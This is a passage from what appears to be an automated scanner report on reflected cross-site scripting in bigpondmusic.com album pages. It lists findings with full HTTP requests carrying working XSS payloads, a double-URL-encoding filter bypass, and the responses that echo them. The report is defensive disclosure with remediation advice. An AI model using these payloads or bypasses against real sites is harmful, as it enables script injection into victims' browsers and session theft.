<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/jebediah/lost-my-nerve?14bc1"style="x:expression(alert(1))"5bf96062524=1" />
...[SNIP]...

2.73. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97338'%3ba8b005e798b was submitted in the REST URL parameter 1. This input was echoed as 97338';a8b005e798b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album97338'%3ba8b005e798b/katy-perry/teenage-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87906


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album97338';a8b005e798b';
   s.prop4 = 'katy-perry';
   s.prop5 = 'teenage-dream2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3
...[SNIP]...

2.74. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949 was submitted in the REST URL parameter 1. This input was echoed as 91242"><script>alert(1)</script>88b03c31949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album91242%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e88b03c31949/katy-perry/teenage-dream2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88218


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album91242"><script>alert(1)</script>88b03c31949/katy-perry/teenage-dream2" />
...[SNIP]...

2.75. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d910c"style%3d"x%3aexpression(alert(1))"024dde3346f was submitted in the h parameter. This input was echoed as d910c"style="x:expression(alert(1))"024dde3346f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/katy-perry/teenage-dream2?h=721914442d910c"style%3d"x%3aexpression(alert(1))"024dde3346f HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119924


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Katy Perry - Teenage Dream -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/katy-perry/teenage-dream2?h=721914442d910c"style="x:expression(alert(1))"024dde3346f" />
...[SNIP]...

2.76. http://bigpondmusic.com/album/katy-perry/teenage-dream2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/katy-perry/teenage-dream2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c9b0"style="x:expression(alert(1))"852375c399a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/katy-perry/teenage-dream2?7c9b0"style%3d"x%3aexpression(alert(1))"852375c399a=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119868


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Katy Perry - Teenage Dream -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/katy-perry/teenage-dream2?7c9b0"style="x:expression(alert(1))"852375c399a=1" />
...[SNIP]...

2.77. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1527c'%3b7ca3ed36b7c was submitted in the REST URL parameter 1. This input was echoed as 1527c';7ca3ed36b7c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1527c'%3b7ca3ed36b7c/ke-ha/we-r-who-we-r HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88208


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1527c';7ca3ed36b7c';
   s.prop4 = 'ke-ha';
   s.prop5 = 'we-r-who-we-r';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|'
...[SNIP]...

2.78. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291 was submitted in the REST URL parameter 1. This input was echoed as 8492d"><script>alert(1)</script>9f6f8063291 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album8492d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f6f8063291/ke-ha/we-r-who-we-r HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album8492d"><script>alert(1)</script>9f6f8063291/ke-ha/we-r-who-we-r" />
...[SNIP]...

2.79. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 was submitted in the h parameter. This input was echoed as eba52"style="x:expression(alert(1))"bbd03f69418 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/ke-ha/we-r-who-we-r?h=761402717eba52"style%3d"x%3aexpression(alert(1))"bbd03f69418 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105180


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Ke$ha - We R Who We R - BigP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?h=761402717eba52"style="x:expression(alert(1))"bbd03f69418" />
...[SNIP]...

2.80. http://bigpondmusic.com/album/ke-ha/we-r-who-we-r [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/ke-ha/we-r-who-we-r

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 310e7"style="x:expression(alert(1))"8dd416912c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/ke-ha/we-r-who-we-r?310e7"style%3d"x%3aexpression(alert(1))"8dd416912c4=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Ke$ha - We R Who We R - BigP
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/ke-ha/we-r-who-we-r?310e7"style="x:expression(alert(1))"8dd416912c4=1" />
...[SNIP]...

2.81. http://bigpondmusic.com/album/keith-urban/get-closer3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd5fb'%3bae57aea958d was submitted in the REST URL parameter 1. This input was echoed as dd5fb';ae57aea958d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumdd5fb'%3bae57aea958d/keith-urban/get-closer3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumdd5fb';ae57aea958d';
   s.prop4 = 'keith-urban';
   s.prop5 = 'get-closer3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 +
...[SNIP]...

2.82. http://bigpondmusic.com/album/keith-urban/get-closer3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a was submitted in the REST URL parameter 1. This input was echoed as 9e9b9"><script>alert(1)</script>81b0a7b047a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9e9b9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e81b0a7b047a/keith-urban/get-closer3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88248


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9e9b9"><script>alert(1)</script>81b0a7b047a/keith-urban/get-closer3" />
...[SNIP]...

2.83. http://bigpondmusic.com/album/keith-urban/get-closer3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/keith-urban/get-closer3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aedb7"style="x:expression(alert(1))"7aaa14c0b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/keith-urban/get-closer3?aedb7"style%3d"x%3aexpression(alert(1))"7aaa14c0b57=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 116006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Keith Urban - Get Closer - B
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/keith-urban/get-closer3?aedb7"style="x:expression(alert(1))"7aaa14c0b57=1" />
...[SNIP]...

2.84. http://bigpondmusic.com/album/kings-of-leon/come-around-sundown [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/kings-of-leon/come-around-sundown

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd was submitted in the REST URL parameter 1. This input was echoed as ef448"><script>alert(1)</script>b1a2ebf5bfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumef448%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb1a2ebf5bfd/kings-of-leon/come-around-sundown HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
